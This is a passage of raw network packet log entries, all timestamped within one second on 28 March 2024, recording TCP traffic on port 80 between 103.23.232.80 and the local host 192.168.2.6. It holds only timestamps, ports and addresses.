                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898309946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898329973 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898344994 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898344994 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898354053 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898360014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898372889 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898384094 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898386002 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898408890 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898427010 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898592949 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898606062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898617983 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898633957 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898641109 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898648977 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898655891 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898663998 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898669958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898679018 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898696899 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898709059 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898739100 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898752928 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898766994 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898781061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898789883 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898798943 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898822069 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898845911 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898885012 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898899078 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898911953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898924112 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898927927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898946047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898956060 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.898972988 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899074078 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899087906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899099112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899111986 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899122953 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899125099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899138927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899152040 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899154902 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899164915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899171114 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899199963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899327993 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899343967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899358034 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899370909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899385929 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899388075 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899401903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899401903 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899416924 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899425983 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899454117 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899501085 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899514914 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899554968 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899669886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899684906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899697065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899707079 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899712086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899724960 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899734974 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899739981 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899761915 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899777889 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899820089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899833918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899847984 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899861097 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899868011 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899876118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899889946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899895906 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899914980 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899935961 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899981976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.899998903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900015116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900019884 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900038004 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900053978 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900151014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900163889 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900177956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900185108 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900192022 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900202990 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900206089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900224924 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900228977 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900235891 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900244951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900259972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900275946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900310040 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900470972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900487900 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900501013 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900511980 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900512934 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900527000 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900538921 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900541067 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900552034 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900568962 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900576115 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900583982 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900590897 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900615931 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900631905 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900656939 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900671005 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900686026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900698900 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900708914 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900712967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900729895 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900737047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900744915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900753021 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900779963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900824070 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900837898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900851965 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900866985 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900876045 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900892019 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900916100 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900945902 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900958061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900985956 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.900999069 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901145935 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901159048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901171923 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901185989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901197910 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901199102 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901210070 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901213884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901227951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901241064 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901251078 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901278019 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901309013 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901321888 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901335955 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901350021 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901357889 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901362896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901377916 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901376963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901402950 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901427984 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901487112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901503086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901516914 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901530027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901536942 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901544094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901557922 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901563883 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901571989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901582956 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901587009 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901609898 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901633024 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901643991 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901657104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901690006 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901854038 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901866913 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901880026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901892900 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901901007 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901905060 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901915073 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901920080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901937008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901943922 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.901973009 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902009010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902023077 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902034998 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902048111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902050972 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902062893 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902067900 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902076960 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902096033 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902110100 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902168036 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902182102 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902216911 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902355909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902368069 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902380943 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902393103 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902398109 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902406931 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902420998 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902424097 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902440071 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902447939 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902463913 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902491093 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902508020 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902519941 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902533054 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902544975 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902558088 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902556896 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902570963 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902582884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902585030 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902597904 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902605057 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902621984 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902643919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902667999 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902682066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902714014 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902853012 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902867079 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902879953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902890921 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902893066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902908087 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902919054 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.902951002 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903001070 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903014898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903028011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903037071 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903040886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903055906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903068066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903073072 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903081894 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903106928 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903126001 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903173923 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903187037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903201103 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903214931 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903224945 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903229952 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903240919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903284073 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903357029 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903369904 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903383017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903394938 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903402090 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903424025 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903438091 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903537989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903552055 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903563976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903577089 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903578997 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.903593063 CET8049718103.23.232.80192.168.2.6
